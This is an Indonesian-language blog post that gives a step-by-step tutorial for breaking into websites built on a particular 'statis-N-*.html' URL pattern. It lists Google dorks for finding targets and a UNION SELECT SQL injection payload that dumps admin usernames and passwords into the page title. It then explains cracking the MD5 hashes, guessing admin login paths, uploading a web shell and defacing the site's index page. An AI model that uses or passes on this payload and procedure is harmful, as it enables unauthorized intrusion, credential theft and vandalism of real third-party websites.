Ok langsung kita bahas aja
Dork:
๐ inurl:statis-1-pengantar.html
๐ inurl:statis-1-beasiswa.html
๐ inurl:statis-1-kerjasama.html
*kembakan lagi dork nya & ganti angka 1 menjadi 2,3,4 dst agar dapat link yang fresh๐
Setelah dapet target exploit url tsb:
statis--7'union%20select%20/*!50000Concat*/(username,0x20,
password)+from+users--+--+
contoh:
website.com/statis-5-blabla.html menjadi website.com/statis--7'
union%20select%20/*!50000Concat*/(username,0x20,passwor
d)+from+users--+--+blabla.html
Jika tampilan web berubah seperti blank atau background jadi putih maka web tsb vuln,jika tidak cari web lain.
Nah,untuk mendapatkan user dan password admin klik ctrl+U
lihat pada bagian <title></title> disitu tertulis user dan password tetapi password masih dalam md5. untuk mendapatkan password asli kita harus mendecrypt md5 tersebut, untuk decryptnya klik disini
Cara decryptnya copy md5 tadi kemudian masukkan chapta dan klik submit.
Setelah muncul barulah kita tau user dan password admin web tsb.
Langkah terakhir, cari tempat login admin web tsb
biasanya seperti ini:
website.com/admin
website.com/adminweb
website.com/administrator
website.com/redaktur
*bisa dipikir-pikir sendiri ๐
Kalau sudah ketemu tinggal login menggunakan user dan pass yang kita dapat,setelah masuk dalam web sbg admin tinggal upload shell kalian dan tebas index nya
Ok sekian dari saya
Silahkan tinggalkan komennya eaa๐
Tidak ada komentar:
Posting Komentar
Silahkan tinggalkan komentar anda dibawah ini :)